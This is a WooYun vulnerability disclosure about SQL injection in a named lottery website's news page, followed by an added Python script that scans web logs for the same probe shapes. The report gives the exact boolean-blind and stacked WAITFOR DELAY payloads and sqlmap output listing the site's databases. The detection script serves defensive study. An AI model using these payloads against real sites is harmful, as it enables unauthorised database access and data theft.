WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles online reader: http://drop.zone.ci/
2015-07-01: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2015-08-15: The vendor has actively ignored the vulnerability; details are disclosed to the public.
Anything involving money is no small matter.
Not sure whether this is real or not? It looks pretty impressive! Next time I'll come here to buy a few lottery tickets too and soak up some luck. Vulnerable parameter ID:
http://m.qucai.com/information/news_view.aspx?ID=24
GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 73 HTTP(s) requests:
---
Parameter: ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=24 AND 4170=4170

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ID=24;WAITFOR DELAY '0:0:5'--
---
[22:30:56] [INFO] testing Microsoft SQL Server
[22:30:56] [INFO] confirming Microsoft SQL Server
[22:30:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[22:30:57] [INFO] fetching database names
[22:30:57] [INFO] fetching number of databases
[22:30:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:30:57] [INFO] retrieved: 8
[22:30:59] [INFO] retrieved: master
[22:31:12] [INFO] retrieved: model
[22:31:24] [INFO] retrieved: msdb
[22:31:34] [INFO] retrieved: QUCAICOM
[22:31:53] [INFO] retrieved: ReportServer
[22:32:21] [INFO] retrieved: ReportServerTempDB
[22:32:59] [INFO] retrieved: tempdb
[22:33:13] [INFO] retrieved: test
available databases [8]:
[ mask region *****ste**********ode**********sdb**********UCA**********ortS**********erverT**********emp********** t***** ]
[22:33:23] [INFO] fetched data logged to text files under '/root/.sqlmap/output/m.qucai.com'
[*] shutting down at 22:33:23
Already proven above.
You know this better than I do.
Could not reach the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)
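The sqlmap output above shows two probe shapes against the ID parameter: a boolean tautology (AND 4170=4170) and a stacked WAITFOR DELAY against SQL Server. From the defender's side, these shapes are easy to spot in web server logs for an endpoint that should only ever receive a numeric ID. The following is an added detection example, not code from the original report or from the site; the log lines are constructed in an IIS-like layout (time, method, path, query, status) and only reuse the endpoint path and parameter name shown on this page, while the `scan_log` and `classify_value` function names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not taken from the original report).
# Layout assumed: time, method, path, raw query string, HTTP status.
SAMPLE_LOG = """\
22:30:40 GET /information/news_view.aspx ID=24 200
22:30:41 GET /information/news_view.aspx ID=24%20AND%204170=4170 200
22:30:42 GET /information/news_view.aspx ID=24%20AND%204170=4171 200
22:30:50 GET /information/news_view.aspx ID=24;WAITFOR%20DELAY%20'0:0:5'-- 200
22:30:55 GET /information/news_view.aspx ID=25 200
"""

# Boolean-based blind probe: "AND <n>=<m>" with integer operands on both sides.
BOOL_PROBE = re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*(\d+)", re.IGNORECASE)
# Time-based probe: a stacked WAITFOR DELAY statement (SQL Server / Sybase).
TIME_PROBE = re.compile(r";\s*WAITFOR\s+DELAY", re.IGNORECASE)
# What news_view.aspx legitimately expects: a plain integer record id.
NUMERIC = re.compile(r"^\d+$")


def classify_value(value):
    """Label one URL-decoded parameter value, or return None if it looks benign."""
    if NUMERIC.match(value):
        return None
    if TIME_PROBE.search(value):
        return "time-based (stacked WAITFOR DELAY)"
    m = BOOL_PROBE.search(value)
    if m:
        kind = "tautology" if m.group(2) == m.group(3) else "contradiction"
        return f"boolean-based ({kind})"
    # Anything else non-numeric is still worth a look on an integer-only endpoint.
    return "non-numeric id"


def query_values(raw_query, param):
    """Split a raw query string on '&' only (never ';', which is part of the payload)."""
    found = []
    for pair in raw_query.split("&"):
        key, _, val = pair.partition("=")
        if key == param:
            found.append(unquote_plus(val))
    return found


def scan_log(text, param="ID"):
    """Return (time, decoded_value, label) for requests whose `param` looks like an injection probe."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # skip malformed lines rather than crash the scan
        ts, _method, _path, query, _status = parts[:5]
        for value in query_values(query, param):
            label = classify_value(value)
            if label:
                findings.append((ts, value, label))
    return findings


if __name__ == "__main__":
    for ts, value, label in scan_log(SAMPLE_LOG):
        print(f"{ts}  {label:40s}  ID={value!r}")
```

The query string is split on `&` by hand because `WAITFOR DELAY` arrives behind a `;`, and some query parsers treat `;` as a separator and would hide the stacked statement. Flagging every non-numeric value on an integer-only endpoint, not just the known payload shapes, is the more robust rule; the specific labels just make the sqlmap run above recognisable in the output.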